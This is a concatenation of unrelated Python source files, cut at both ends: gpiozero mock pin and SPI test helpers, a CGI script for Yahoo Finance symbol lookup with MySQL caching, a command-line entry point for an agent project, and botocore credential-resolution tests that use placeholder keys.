value = float(value)
except ValueError:
raise PinInvalidBounce('bounce must be None or a float')
self._bounce = value
def _get_edges(self):
return self._edges
def _set_edges(self, value):
assert value in ('none', 'falling', 'rising', 'both')
self._edges = value
def _disable_event_detect(self):
pass
def _enable_event_detect(self):
pass
def _call_when_changed(self):
super()._call_when_changed(self._last_change, self._state)
def drive_high(self):
assert self._function == 'input'
if self._change_state(True):
if self._edges in ('both', 'rising') and self._when_changed is not None:
self._call_when_changed()
def drive_low(self):
assert self._function == 'input'
if self._change_state(False):
if self._edges in ('both', 'falling') and self._when_changed is not None:
self._call_when_changed()
def clear_states(self):
self._last_change = monotonic()
self.states = [PinState(0.0, self._state)]
def assert_states(self, expected_states):
# Tests that the pin went through the expected states (a list of values)
for actual, expected in zip(self.states, expected_states):
assert actual.state == expected
def assert_states_and_times(self, expected_states):
# Tests that the pin went through the expected states at the expected
# times (times are compared with a tolerance of tens-of-milliseconds as
# that's about all we can reasonably expect in a non-realtime
# environment on a Pi 1)
for actual, expected in zip(self.states, expected_states):
assert isclose(actual.timestamp, expected[0], rel_tol=0.05, abs_tol=0.05)
            assert isclose(actual.state, expected[1])
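# A minimal usage sketch (assumes this module is importable as gpiozero.pins.mock;
# pin 17 is an arbitrary choice with no physical pull-up):
#
#     factory = MockFactory()
#     pin = factory.pin(17)              # constructs a MockPin
#     pin.function = 'output'
#     pin.state = 1
#     pin.assert_states([False, True])   # started low (floating), then driven high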
class MockConnectedPin(MockPin):
"""
This derivative of :class:`MockPin` emulates a pin connected to another
mock pin. This is used in the "real pins" portion of the test suite to
check that one pin can influence another.
"""
def __init__(self, factory, number, input_pin=None):
super().__init__(factory, number)
self.input_pin = input_pin
def _change_state(self, value):
if self.input_pin:
if value:
self.input_pin.drive_high()
else:
self.input_pin.drive_low()
return super()._change_state(value)
class MockChargingPin(MockPin):
"""
This derivative of :class:`MockPin` emulates a pin which, when set to
input, waits a predetermined length of time and then drives itself high
(as if attached to, e.g. a typical circuit using an LDR and a capacitor
to time the charging rate).
"""
def __init__(self, factory, number, charge_time=0.01):
super().__init__(factory, number)
self.charge_time = charge_time # dark charging time
self._charge_stop = Event()
self._charge_thread = None
def _set_function(self, value):
super()._set_function(value)
if value == 'input':
if self._charge_thread:
self._charge_stop.set()
self._charge_thread.join()
self._charge_stop.clear()
self._charge_thread = Thread(target=self._charge)
self._charge_thread.start()
elif value == 'output':
if self._charge_thread:
self._charge_stop.set()
self._charge_thread.join()
else:
assert False
def _charge(self):
if not self._charge_stop.wait(self.charge_time):
try:
self.drive_high()
except AssertionError: # pragma: no cover
# Charging pins are typically flipped between input and output
# repeatedly; if another thread has already flipped us to
# output ignore the assertion-error resulting from attempting
# to drive the pin high
pass
class MockTriggerPin(MockPin):
"""
This derivative of :class:`MockPin` is intended to be used with another
:class:`MockPin` to emulate a distance sensor. Set *echo_pin* to the
corresponding pin instance. When this pin is driven high it will trigger
the echo pin to drive high for the echo time.
"""
def __init__(self, factory, number, echo_pin=None, echo_time=0.04):
super().__init__(factory, number)
self.echo_pin = echo_pin
self.echo_time = echo_time # longest echo time
self._echo_thread = None
def _set_state(self, value):
super()._set_state(value)
if value:
if self._echo_thread:
self._echo_thread.join()
self._echo_thread = Thread(target=self._echo)
self._echo_thread.start()
def _echo(self):
sleep(0.001)
self.echo_pin.drive_high()
sleep(self.echo_time)
self.echo_pin.drive_low()
class MockPWMPin(MockPin):
"""
This derivative of :class:`MockPin` adds PWM support.
"""
def __init__(self, factory, number):
super().__init__(factory, number)
self._frequency = None
def close(self):
self.frequency = None
super().close()
def _set_state(self, value):
if self._function == 'input':
raise PinSetInput(
'cannot set state of pin {self!r}'.format(self=self))
assert self._function == 'output'
assert 0 <= value <= 1
self._change_state(float(value))
def _get_frequency(self):
return self._frequency
def _set_frequency(self, value):
if value is not None:
assert self._function == 'output'
self._frequency = value
if value is None:
self._change_state(0.0)
class MockSPIClockPin(MockPin):
"""
This derivative of :class:`MockPin` is intended to be used as the clock pin
of a mock SPI device. It is not intended for direct construction in tests;
rather, construct a :class:`MockSPIDevice` with various pin numbers, and
this class will be used for the clock pin.
"""
def __init__(self, factory, number):
super().__init__(factory, number)
self.spi_devices = getattr(self, 'spi_devices', [])
def _set_state(self, value):
super()._set_state(value)
for dev in self.spi_devices:
dev.on_clock()
class MockSPISelectPin(MockPin):
"""
This derivative of :class:`MockPin` is intended to be used as the select
pin of a mock SPI device. It is not intended for direct construction in
tests; rather, construct a :class:`MockSPIDevice` with various pin numbers,
and this class will be used for the select pin.
"""
def __init__(self, factory, number):
super().__init__(factory, number)
self.spi_device = getattr(self, 'spi_device', None)
def _set_state(self, value):
super()._set_state(value)
if self.spi_device:
self.spi_device.on_select()
class MockSPIDevice:
"""
This class is used to test :class:`SPIDevice` implementations. It can be
used to mock up the slave side of simple SPI devices, e.g. the MCP3xxx
series of ADCs.
Descendants should override the :meth:`on_start` and/or :meth:`on_bit`
methods to respond to SPI interface events. The :meth:`rx_word` and
    :meth:`tx_word` methods can be used to facilitate communications within these
    methods. Such descendants can then be passed as the *spi_class* parameter
of the :class:`MockFactory` constructor to have instances attached to any
SPI interface requested by an :class:`SPIDevice`.
"""
def __init__(self, clock_pin, mosi_pin=None, miso_pin=None,
select_pin=None, *, clock_polarity=False, clock_phase=False,
lsb_first=False, bits_per_word=8, select_high=False,
pin_factory=None):
if pin_factory is None:
pin_factory = Device.pin_factory
assert isinstance(pin_factory, MockFactory)
self.clock_pin = pin_factory.pin(clock_pin, pin_class=MockSPIClockPin)
self.mosi_pin = None if mosi_pin is None else pin_factory.pin(mosi_pin)
self.miso_pin = None if miso_pin is None else pin_factory.pin(miso_pin)
self.select_pin = None if select_pin is None else pin_factory.pin(select_pin, pin_class=MockSPISelectPin)
self.clock_polarity = clock_polarity
self.clock_phase = clock_phase
self.lsb_first = lsb_first
self.bits_per_word = bits_per_word
self.select_high = select_high
self.rx_bit = 0
self.rx_buf = []
self.tx_buf = []
self.clock_pin.spi_devices.append(self)
self.select_pin.spi_device = self
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
def close(self):
if self in self.clock_pin.spi_devices:
self.clock_pin.spi_devices.remove(self)
if self.select_pin is not None:
self.select_pin.spi_device = None
def on_select(self):
if self.select_pin.state == self.select_high:
self.on_start()
def on_clock(self):
# Don't do anything if this SPI device isn't currently selected
if self.select_pin is None or self.select_pin.state == self.select_high:
# The XOR of the clock pin's values, polarity and phase indicates
# whether we're meant to be acting on this edge
if self.clock_pin.state ^ self.clock_polarity ^ self.clock_phase:
self.rx_bit += 1
if self.mosi_pin is not None:
self.rx_buf.append(self.mosi_pin.state)
if self.miso_pin is not None:
try:
tx_value = self.tx_buf.pop(0)
except IndexError:
tx_value = 0
if tx_value:
self.miso_pin.drive_high()
else:
self.miso_pin.drive_low()
self.on_bit()
def on_start(self):
"""
        Override this in descendants to detect when the mock SPI device's
select line is activated.
"""
self.rx_bit = 0
self.rx_buf = []
self.tx_buf = []
def on_bit(self):
"""
        Override this in descendants to react to receiving a bit.
        The :attr:`rx_bit` attribute gives the index of the bit received (this
        is reset to 0 by default by :meth:`on_select`). The :attr:`rx_buf`
        sequence gives the sequence of 1s and 0s that have been received so
far. The :attr:`tx_buf` sequence gives the sequence of 1s and 0s to
transmit on the next clock pulses. All these attributes can be modified
within this method.
The :meth:`rx_word` and :meth:`tx_word` methods can also be used to
read and append to the buffers using integers instead of bool bits.
"""
pass
def rx_word(self):
result = 0
bits = reversed(self.rx_buf) if self.lsb_first else self.rx_buf
for bit in bits:
result <<= 1
result |= bit
return result
def tx_word(self, value, bits_per_word=None):
if bits_per_word is None:
bits_per_word = self.bits_per_word
bits = [0] * bits_per_word
for bit in range(bits_per_word):
bits[bit] = value & 1
value >>= 1
assert not value
if not self.lsb_first:
bits = reversed(bits)
self.tx_buf.extend(bits)
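# A minimal descendant sketch (illustrative only, not part of the library): an
# "echo" device that, once a full word has been clocked in, queues the same word
# for transmission back on MISO.
#
#     class MockEchoDevice(MockSPIDevice):
#         def on_bit(self):
#             if self.rx_bit == self.bits_per_word:
#                 self.tx_word(self.rx_word())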
class MockFactory(PiFactory):
"""
Factory for generating mock pins.
The *revision* parameter specifies what revision of Pi the mock factory
pretends to be (this affects the result of the :attr:`Factory.pi_info`
attribute as well as where pull-ups are assumed to be).
The *pin_class* attribute specifies which mock pin class will be generated
by the :meth:`pin` method by default. This can be changed after
construction by modifying the :attr:`pin_class` attribute.
.. attribute:: pin_class
This attribute stores the :class:`MockPin` class (or descendant) that
will be used when constructing pins with the :meth:`pin` method (if
no *pin_class* parameter is used to override it). It defaults on
construction to the value of the *pin_class* parameter in the
constructor, or :class:`MockPin` if that is unspecified.
"""
def __init__(self, revision=None, pin_class=None):
super().__init__()
if revision is None:
revision = os.environ.get('GPIOZERO_MOCK_REVISION', 'a02082')
if pin_class is None:
pin_class = os.environ.get('GPIOZERO_MOCK_PIN_CLASS', MockPin)
self._revision = int(revision, base=16)
if isinstance(pin_class, bytes):
pin_class = pin_class.decode('ascii')
if isinstance(pin_class, str):
dist = pkg_resources.get_distribution('gpiozero')
group = 'gpiozero_mock_pin_classes'
pin_class = pkg_resources.load_entry_point(
dist, group, pin_class.lower())
if not issubclass(pin_class, MockPin):
raise ValueError(
'invalid mock pin_class: {pin_class!r}'.format(
pin_class=pin_class))
self.pin_class = pin_class
def _get_revision(self):
return self._revision
def reset(self):
"""
Clears the pins and reservations sets. This is primarily useful in
test suites to ensure the pin factory is back in a "clean" state before
the next set of tests are run.
"""
self.pins.clear()
self._reservations.clear()
def pin(self, spec, pin_class=None, **kwargs):
"""
The pin method for :class:`MockFactory` additionally takes a
*pin_class* attribute which can be used to override the class'
:attr:`pin_class` attribute. Any additional keyword arguments will be
passed along to the pin constructor (useful with things like
:class:`MockConnectedPin` which expect to be constructed with another
pin).
"""
if pin_class is None:
pin_class = self.pin_class
n = self.pi_info.to_gpio(spec)
try:
pin = self.pins[n]
except KeyError:
pin = pin_class(self, n, **kwargs)
self.pins[n] = pin
else:
# Ensure the pin class expected supports PWM (or not)
if issubclass(pin_class, MockPWMPin) != isinstance(pin, MockPWMPin):
raise ValueError(
'pin {n} is already in use as a '
'{pin.__class__.__name__}'.format(n=n, pin=pin))
return pin
def _get_spi_class(self, shared, hardware):
return MockSPIInterfaceShared if shared else MockSPIInterface
@staticmethod
def ticks():
return monotonic()
@staticmethod
def ticks_diff(later, earlier):
return later - earlier
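# Typical test-suite usage (sketch; Device is imported above from ..devices):
#
#     Device.pin_factory = MockFactory(pin_class=MockPWMPin)
#     pin = Device.pin_factory.pin(12)   # MockPWMPin, so PWM devices will work
#     Device.pin_factory.reset()         # clear pins/reservations between tests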
class MockSPIInterface(SPISoftware):
pass
class MockSPIInterfaceShared(SharedMixin, MockSPIInterface):
@classmethod
def _shared_key(cls, clock_pin, mosi_pin, miso_pin, select_pin,
pin_factory):
return (clock_pin, select_pin)
|
index.py
|
#!/usr/bin/pypy3
#!/usr/bin/python3
import cgi
import mysql.connector
from datetime import datetime, timedelta
from threading import Thread
from urllib.request import Request, urlopen
import json
def commit(company_name, results, cursor, cnx):
    # Use parameterised queries so the values are escaped by the driver
    sql1 = "DELETE FROM yahoofinancessearch WHERE company_name=%s;"
    sql2 = "INSERT INTO yahoofinancessearch VALUES(%s, %s, %s);"
    cursor.execute(sql1, (company_name,))
    cnx.commit()
    cursor.execute(sql2, (company_name, results, str(datetime.now())))
    cnx.commit()
cursor.close()
cnx.close()
def expected(dump):
return True
def site(company_name):
currencies = ['nzd', 'usd', 'eur', 'aud', 'sgd']
if company_name in currencies:
currencies.remove(company_name)
return json.dumps({'results':[company_name+'/'+c for c in currencies]})
elif len(company_name) == 7 and company_name[:3] in currencies and company_name[4:] in currencies:
return json.dumps({'results':[company_name[:3]+'/'+company_name[4:]]})
else:
url = 'https://nz.finance.yahoo.com/lookup?s={}'.format(company_name).replace(' ', '%20')
req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
webpage = urlopen(req).read()
html = webpage.decode('utf-8').replace('\r', '').replace('\n', '')
results = []
html = html[html.find('Symbols similar to'):]
index = html.find('data-symbol="')
while index != -1:
html = html[index+13:]
end = html.find('"')
results.append(html[:end])
index = html.find('data-symbol="')
output = []
for result in results:
if result not in output:
output.append(result)
return json.dumps({'results':output})
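# Example of the two currency branches above (derived from the hard-coded list):
# site('nzd') returns {"results": ["nzd/usd", "nzd/eur", "nzd/aud", "nzd/sgd"]}
# and site('nzd/usd') returns {"results": ["nzd/usd"]}; anything else falls
# through to the Yahoo Finance symbol lookup.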
def main():
form = cgi.FieldStorage()
company_name = str(form['company_name'].value).lower().strip()
cnx = mysql.connector.connect(user='api', database='projectapi')
cursor = cnx.cursor(buffered=True)
    sql = "SELECT * FROM yahoofinancessearch WHERE company_name=%s;"
    cursor.execute(sql, (company_name,))
cache_results = ''
cache_expired = False
fetch_results = ''
results = ''
try:
        # Row layout matches the INSERT in commit(): (company_name, results, timestamp)
        data = list(cursor.fetchall()[0])
        if (datetime.now() - timedelta(days=60)) > data[2]:
            raise IndexError('item in database expired')
        cache_results = data[1]
        cursor.close()
        cnx.close()
    except Exception:
        cache_expired = True
fetch_results = site(company_name)
finally:
if not cache_expired:
results = cache_results
elif expected(fetch_results):
t1 = Thread(target=commit, args=(company_name, fetch_results, cursor, cnx,))
t1.start()
results = fetch_results
elif cache_expired:
results = cache_results
else:
results = json.dumps({'error':'api access problem'})
return results
if __name__ == '__main__':
print('Content-type:application/json', end='\r\n\r\n')
print(main().encode(encoding='UTF-8',errors='ignore').decode(), end='')
|
__main__.py
|
# main code for the agent
import sys
from utilz import utils_capture
import threading
from time import time, sleep
from agents import sis
from app import client
import os
import config
config = config.Config()
cwd = os.getcwd()
recording_folder = cwd+'/datasets/recording/'
test_folder = recording_folder+'/test/'
train_folder = recording_folder+'/train/'
model_folder = cwd+'/models/'
def record_session(duration, interval, mode, format):
app = client.Client()
    # Pass the callables to Thread(target=...); calling them here would block before the threads start
    t1 = threading.Thread(target=app.start, kwargs={'recording': True, 'mode': mode})
    t1.start()
    sc = utils_capture.InputRecord(recording_folder, config.capture_mode.get(mode)[0], config.capture_mode.get(mode)[1], interval=interval)
    t2 = threading.Thread(target=sc.begin_recording)
    t2.start()
sleep(duration)
sc.stop_recording(format)
app.stop()
return
def train_sis(mode):
#training
agent = sis.SIS(mode)
agent.build_sis()
return
def run():
app = client.Client()
app.start()
return
if __name__ == '__main__':
import argparse
# Parse command line arguments
parser = argparse.ArgumentParser(
description='Welcome to AIAIM, please enter a command.')
parser.add_argument("command",
metavar="<command>",
help="'help' 'record' 'train' or 'run'")
#Recording
parser.add_argument('--duration', required=False,
metavar="100",
help='Duration of the recording session in seconds')
parser.add_argument('--interval', required=False,
metavar=".200",
help="Interval between screen captures in seconds")
parser.add_argument('--mode', required=False,
metavar="lr",
help="The mode the images are captured as. 'wr' 'sr' or 'lr'")
parser.add_argument('--format', required=False,
metavar="png",
help="The format the images are saved as. 'h5' or 'png'")
#Training
parser.add_argument('--network', required=False,
metavar="vae",
help='The network you want to train')
parser.add_argument('--load_existing', required=False,
metavar="/path/to/existing/model.h5",
help='The path to the model you want to load.')
#Eval
parser.add_argument('--lol', required=False,
metavar="vae",
help='The network you want to evaluate')
args = parser.parse_args()
# Validate arguments
if args.command == "help":
        print('Hi from AIAIM!\nPlease refer to the readme instructions for setup.\nGo to the Quickstart section to see how to train your first agent!')
elif args.command == "record":
assert args.duration, "Argument --duration is required for recording"
assert args.interval, "Argument --interval is required for recording"
assert args.mode, "Argument --mode is required for recording"
assert args.format, "Argument --format is required for recording"
record_session(int(args.duration), float(args.interval), args.mode, args.format)
elif args.command == "train":
assert args.network, "Argument --network is required for training"
elif args.command == "run":
run()
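# Example invocations (sketch, matching the arguments defined above):
#
#     python __main__.py record --duration 100 --interval 0.2 --mode lr --format png
#     python __main__.py train --network vae
#     python __main__.py run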
|
test_credentials.py
|
# Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import uuid
import threading
import os
import math
import time
import mock
import tempfile
import shutil
from datetime import datetime, timedelta
import sys
from dateutil.tz import tzlocal
from botocore.exceptions import CredentialRetrievalError
from tests import unittest, IntegerRefresher, BaseEnvVar, random_chars
from tests import temporary_file, StubbedSession
from botocore.credentials import EnvProvider, ContainerProvider
from botocore.credentials import InstanceMetadataProvider
from botocore.credentials import Credentials, ReadOnlyCredentials
from botocore.credentials import AssumeRoleProvider, ProfileProviderBuilder
from botocore.credentials import CanonicalNameCredentialSourcer
from botocore.credentials import DeferredRefreshableCredentials
from botocore.credentials import create_credential_resolver
from botocore.session import Session
from botocore.exceptions import InvalidConfigError, InfiniteLoopConfigError
from botocore.stub import Stubber
from botocore.awsrequest import AWSResponse
class TestCredentialRefreshRaces(unittest.TestCase):
def assert_consistent_credentials_seen(self, creds, func):
collected = []
self._run_threads(20, func, collected)
for creds in collected:
            # During testing, the refresher uses its current
# refresh count as the values for the access, secret, and
# token value. This means that at any given point in time,
# the credentials should be something like:
#
# ReadOnlyCredentials('1', '1', '1')
# ReadOnlyCredentials('2', '2', '2')
# ...
# ReadOnlyCredentials('30', '30', '30')
#
# This makes it really easy to verify we see a consistent
# set of credentials from the same time period. We just
# check if all the credential values are the same. If
# we ever see something like:
#
# ReadOnlyCredentials('1', '2', '1')
#
# We fail. This is because we're using the access_key
# from the first refresh ('1'), the secret key from
# the second refresh ('2'), and the token from the
# first refresh ('1').
self.assertTrue(creds[0] == creds[1] == creds[2], creds)
def assert_non_none_retrieved_credentials(self, func):
collected = []
self._run_threads(50, func, collected)
for cred in collected:
self.assertIsNotNone(cred)
def _run_threads(self, num_threads, func, collected):
threads = []
for _ in range(num_threads):
threads.append(threading.Thread(target=func, args=(collected,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def test_has_no_race_conditions(self):
creds = IntegerRefresher(
creds_last_for=2,
advisory_refresh=1,
mandatory_refresh=0
)
def _run_in_thread(collected):
for _ in range(4000):
frozen = creds.get_frozen_credentials()
collected.append((frozen.access_key,
frozen.secret_key,
frozen.token))
start = time.time()
self.assert_consistent_credentials_seen(creds, _run_in_thread)
end = time.time()
# creds_last_for = 2 seconds (from above)
        # So, for example, if execution took 6.1 seconds, then we should see at
        # most ceil(6.1 / 2.0) + 1 = 5 refreshes
max_calls_allowed = math.ceil((end - start) / 2.0) + 1
self.assertTrue(creds.refresh_counter <= max_calls_allowed,
"Too many cred refreshes, max: %s, actual: %s, "
"time_delta: %.4f" % (max_calls_allowed,
creds.refresh_counter,
(end - start)))
def test_no_race_for_immediate_advisory_expiration(self):
creds = IntegerRefresher(
creds_last_for=1,
advisory_refresh=1,
mandatory_refresh=0
)
def _run_in_thread(collected):
for _ in range(100):
frozen = creds.get_frozen_credentials()
collected.append((frozen.access_key,
frozen.secret_key,
frozen.token))
self.assert_consistent_credentials_seen(creds, _run_in_thread)
def test_no_race_for_initial_refresh_of_deferred_refreshable(self):
def get_credentials():
expiry_time = (
datetime.now(tzlocal()) + timedelta(hours=24)).isoformat()
return {
'access_key': 'my-access-key',
'secret_key': 'my-secret-key',
'token': 'my-token',
'expiry_time': expiry_time
}
deferred_creds = DeferredRefreshableCredentials(
get_credentials, 'fixed')
def _run_in_thread(collected):
frozen = deferred_creds.get_frozen_credentials()
collected.append(frozen)
self.assert_non_none_retrieved_credentials(_run_in_thread)
class BaseAssumeRoleTest(BaseEnvVar):
def setUp(self):
super(BaseAssumeRoleTest, self).setUp()
self.tempdir = tempfile.mkdtemp()
self.config_file = os.path.join(self.tempdir, 'config')
self.environ['AWS_CONFIG_FILE'] = self.config_file
self.environ['AWS_SHARED_CREDENTIALS_FILE'] = str(uuid.uuid4())
def tearDown(self):
shutil.rmtree(self.tempdir)
super(BaseAssumeRoleTest, self).tearDown()
def some_future_time(self):
timeobj = datetime.now(tzlocal())
return timeobj + timedelta(hours=24)
def create_assume_role_response(self, credentials, expiration=None):
if expiration is None:
expiration = self.some_future_time()
response = {
'Credentials': {
'AccessKeyId': credentials.access_key,
'SecretAccessKey': credentials.secret_key,
'SessionToken': credentials.token,
'Expiration': expiration
},
'AssumedRoleUser': {
'AssumedRoleId': 'myroleid',
'Arn': 'arn:aws:iam::1234567890:user/myuser'
}
}
return response
def create_random_credentials(self):
return Credentials(
'fake-%s' % random_chars(15),
'fake-%s' % random_chars(35),
'fake-%s' % random_chars(45)
)
def assert_creds_equal(self, c1, c2):
c1_frozen = c1
if not isinstance(c1_frozen, ReadOnlyCredentials):
c1_frozen = c1.get_frozen_credentials()
c2_frozen = c2
if not isinstance(c2_frozen, ReadOnlyCredentials):
c2_frozen = c2.get_frozen_credentials()
self.assertEqual(c1_frozen, c2_frozen)
def write_config(self, config):
with open(self.config_file, 'w') as f:
f.write(config)
class TestAssumeRole(BaseAssumeRoleTest):
def setUp(self):
super(TestAssumeRole, self).setUp()
self.environ['AWS_ACCESS_KEY_ID'] = 'access_key'
self.environ['AWS_SECRET_ACCESS_KEY'] = 'secret_key'
self.metadata_provider = self.mock_provider(InstanceMetadataProvider)
self.env_provider = self.mock_provider(EnvProvider)
self.container_provider = self.mock_provider(ContainerProvider)
self.mock_client_creator = mock.Mock(spec=Session.create_client)
self.actual_client_region = None
current_dir = os.path.dirname(os.path.abspath(__file__))
credential_process = os.path.join(
current_dir, 'utils', 'credentialprocess.py'
)
self.credential_process = '%s %s' % (
sys.executable, credential_process
)
def mock_provider(self, provider_cls):
mock_instance = mock.Mock(spec=provider_cls)
mock_instance.load.return_value = None
mock_instance.METHOD = provider_cls.METHOD
mock_instance.CANONICAL_NAME = provider_cls.CANONICAL_NAME
return mock_instance
def create_session(self, profile=None):
session = StubbedSession(profile=profile)
        # We have to set bogus credentials here, otherwise we'll trigger
# an early credential chain resolution.
sts = session.create_client(
'sts',
aws_access_key_id='spam',
aws_secret_access_key='eggs',
)
self.mock_client_creator.return_value = sts
assume_role_provider = AssumeRoleProvider(
load_config=lambda: session.full_config,
client_creator=self.mock_client_creator,
cache={},
profile_name=profile,
credential_sourcer=CanonicalNameCredentialSourcer([
self.env_provider, self.container_provider,
self.metadata_provider
]),
profile_provider_builder=ProfileProviderBuilder(session),
)
stubber = session.stub('sts')
stubber.activate()
component_name = 'credential_provider'
resolver = session.get_component(component_name)
available_methods = [p.METHOD for p in resolver.providers]
replacements = {
'env': self.env_provider,
'iam-role': self.metadata_provider,
'container-role': self.container_provider,
'assume-role': assume_role_provider
}
for name, provider in replacements.items():
try:
index = available_methods.index(name)
except ValueError:
# The provider isn't in the session
continue
resolver.providers[index] = provider
session.register_component(
'credential_provider', resolver
)
return session, stubber
def test_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
def test_environment_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = Environment\n'
)
self.write_config(config)
environment_creds = self.create_random_credentials()
self.env_provider.load.return_value = environment_creds
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
self.assertEqual(self.env_provider.load.call_count, 1)
def test_instance_metadata_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = Ec2InstanceMetadata\n'
)
self.write_config(config)
metadata_creds = self.create_random_credentials()
self.metadata_provider.load.return_value = metadata_creds
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
self.assertEqual(self.metadata_provider.load.call_count, 1)
def test_container_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = EcsContainer\n'
)
self.write_config(config)
container_creds = self.create_random_credentials()
self.container_provider.load.return_value = container_creds
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
self.assertEqual(self.container_provider.load.call_count, 1)
def test_invalid_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = CustomInvalidProvider\n'
)
self.write_config(config)
with self.assertRaises(InvalidConfigError):
session, _ = self.create_session(profile='A')
session.get_credentials()
def test_misconfigured_source_profile(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'region = us-west-2\n'
)
self.write_config(config)
with self.assertRaises(InvalidConfigError):
session, _ = self.create_session(profile='A')
session.get_credentials().get_frozen_credentials()
def test_recursive_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'role_arn = arn:aws:iam::123456789:role/RoleB\n'
'source_profile = C\n\n'
'[profile C]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
profile_b_creds = self.create_random_credentials()
profile_b_response = self.create_assume_role_response(profile_b_creds)
profile_a_creds = self.create_random_credentials()
profile_a_response = self.create_assume_role_response(profile_a_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', profile_b_response)
stubber.add_response('assume_role', profile_a_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, profile_a_creds)
stubber.assert_no_pending_responses()
def test_recursive_assume_role_stops_at_static_creds(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
'role_arn = arn:aws:iam::123456789:role/RoleB\n'
'source_profile = C\n\n'
'[profile C]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
profile_a_creds = self.create_random_credentials()
profile_a_response = self.create_assume_role_response(profile_a_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', profile_a_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, profile_a_creds)
stubber.assert_no_pending_responses()
def test_infinitely_recursive_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = A\n'
)
self.write_config(config)
with self.assertRaises(InfiniteLoopConfigError):
session, _ = self.create_session(profile='A')
session.get_credentials()
def test_process_source_profile(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'credential_process = %s\n' % self.credential_process
)
self.write_config(config)
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
# Assert that the client was created with the credentials from the
# credential process.
self.assertEqual(self.mock_client_creator.call_count, 1)
_, kwargs = self.mock_client_creator.call_args_list[0]
expected_kwargs = {
'aws_access_key_id': 'spam',
'aws_secret_access_key': 'eggs',
'aws_session_token': None,
}
self.assertEqual(kwargs, expected_kwargs)
def test_web_identity_source_profile(self):
token_path = os.path.join(self.tempdir, 'token')
with open(token_path, 'w') as token_file:
token_file.write('a.token')
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'role_arn = arn:aws:iam::123456789:role/RoleB\n'
'web_identity_token_file = %s\n' % token_path
)
self.write_config(config)
session, stubber = self.create_session(profile='A')
identity_creds = self.create_random_credentials()
identity_response = self.create_assume_role_response(identity_creds)
stubber.add_response(
'assume_role_with_web_identity',
identity_response,
)
expected_creds = self.create_random_credentials()
assume_role_response = self.create_assume_role_response(expected_creds)
stubber.add_response('assume_role', assume_role_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
# Assert that the client was created with the credentials from the
# assume role with web identity call.
self.assertEqual(self.mock_client_creator.call_count, 1)
_, kwargs = self.mock_client_creator.call_args_list[0]
expected_kwargs = {
'aws_access_key_id': identity_creds.access_key,
'aws_secret_access_key': identity_creds.secret_key,
'aws_session_token': identity_creds.token,
}
self.assertEqual(kwargs, expected_kwargs)
def test_web_identity_source_profile_ignores_env_vars(self):
token_path = os.path.join(self.tempdir, 'token')
with open(token_path, 'w') as token_file:
token_file.write('a.token')
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleB'
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
